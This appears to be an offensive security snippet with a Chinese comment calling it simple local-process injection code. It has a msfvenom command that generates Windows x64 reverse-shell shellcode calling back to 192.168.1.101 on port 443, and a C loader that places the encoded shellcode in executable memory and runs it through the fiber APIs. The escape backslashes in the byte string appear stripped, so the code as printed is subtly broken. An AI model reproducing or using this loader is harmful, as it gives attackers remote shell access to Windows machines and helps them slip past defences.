msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.1.101 LPORT=443 -f c -b x00x0ax0d
这是一个简单的注入本地进程的代码
#include "stdafx.h"
#include <Windows.h>
int main()
{
PVOID mainFiber = ConvertThreadToFiber(NULL);
unsigned char shellcode[] =
"x48x31xc9x48x81xe9xc6xffxffxffx48x8dx05xefxff"
"xffxffx48xbbx7exbaxddx1fx3bx4fx8cx24x48x31x58"
"x27x48x2dxf8xffxffxffxe2xf4x82xf2x5exfbxcbxa7"
"x4cx24x7exbax9cx4ex7ax1fxdex75x28xf2xecxcdx5e"
"x07x07x76x1exf2x56x4dx23x07x07x76x5exf2x56x6d"
"x6bx07x83x93x34xf0x90x2exf2x07xbdxe4xd2x86xbc"
"x63x39x63xacx65xbfx73xd0x5ex3ax8ex6exc9x2cxfb"
"x8cx57xb0x1dxacxafx3cx86x95x1exebxc4x0cxacx7e"
"xbaxddx57xbex8fxf8x43x36xbbx0dx4fxb0x07x94x60"
"xf5xfaxfdx56x3ax9fx6fx72x36x45x14x5exb0x7bx04"
"x6cx7fx6cx90x2exf2x07xbdxe4xd2xfbx1cxd6x36x0e"
"x8dxe5x46x5axa8xeex77x4cxc0x00x76xffxe4xcex4e"
"x97xd4x60xf5xfaxf9x56x3ax9fxeax65xf5xb6x95x5b"
"xb0x0fx90x6dx7fx6ax9cx94x3fxc7xc4x25xaexfbx85"
"x5ex63x11xd5x7ex3fxe2x9cx46x7ax15xc4xa7x92x9a"
"x9cx4dxc4xafxd4x65x27xe0x95x94x29xa6xdbxdbx81"
"x45x80x56x85x38xffx16x21x89xefx1fx3bx0exdax6d"
"xf7x5cx95x9exd7xefx8dx24x7exf3x54xfax72xf3x8e"
"x24x7fx01x1dxb7x3ax2axcdx70x37x33x39x53xb2xbe"
"xcdx9ex32xcdxfbx18xc4x9axc0xadx94xd2xdcx1ex3b"
"x4fxd5x65xc4x93x5dx74x3bxb0x59x74x2exf7xecxd6"
"x76x7ex4cx6cx81x7ax95x96xf9x07x73xe4x36x33x1c"
"x5ex81xa5x83xfbx9ex45x08x57xb2x88xe6x34x3fxe2"
"x91x96xd9x07x05xddx3fx00x44xbax4fx2ex73xf1x36"
"x3bx19x5fx39x4fx8cx6dxc6xd9xb0x7bx3bx4fx8cx24"
"x7exfbx8dx5ex6bx07x05xc6x29xedx8ax52x0ax8fxe6"
"x29x27xfbx8dxfdxc7x29x4bx60x5axeexdcx1ex73xc2"
"xc8x00x66x7cxddx77x73xc6x6ax72x2exfbx8dx5ex6b"
"x0exdcx6dx81x7ax9cx4fx72xb0x44x69xf7x7bx91x96"
"xfax0ex36x5dxb2x85x5bxe0xeex07xbdxf6x36x45x17"
"x94x35x0ex36x2cxf9xa7xbdxe0xeexf4x7cx91xdcxec"
"x9cxa5x9dxdax31xb9x81x6fx95x9cxffx67xb0x22x02"
"xb0x5dxe4xdbx3ax89x9fx39xa9xafx70x51x4fxd5x65"
"xf7x60x22xcax3bx4fx8cx24";
PVOID shellcodeLocation = VirtualAlloc(0, sizeof shellcode, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
memcpy(shellcodeLocation, shellcode, sizeof shellcode);
PVOID shellcodeFiber = CreateFiber(NULL, (LPFIBER_START_ROUTINE)shellcodeLocation, NULL);
SwitchToFiber(shellcodeFiber);
return 0;
}
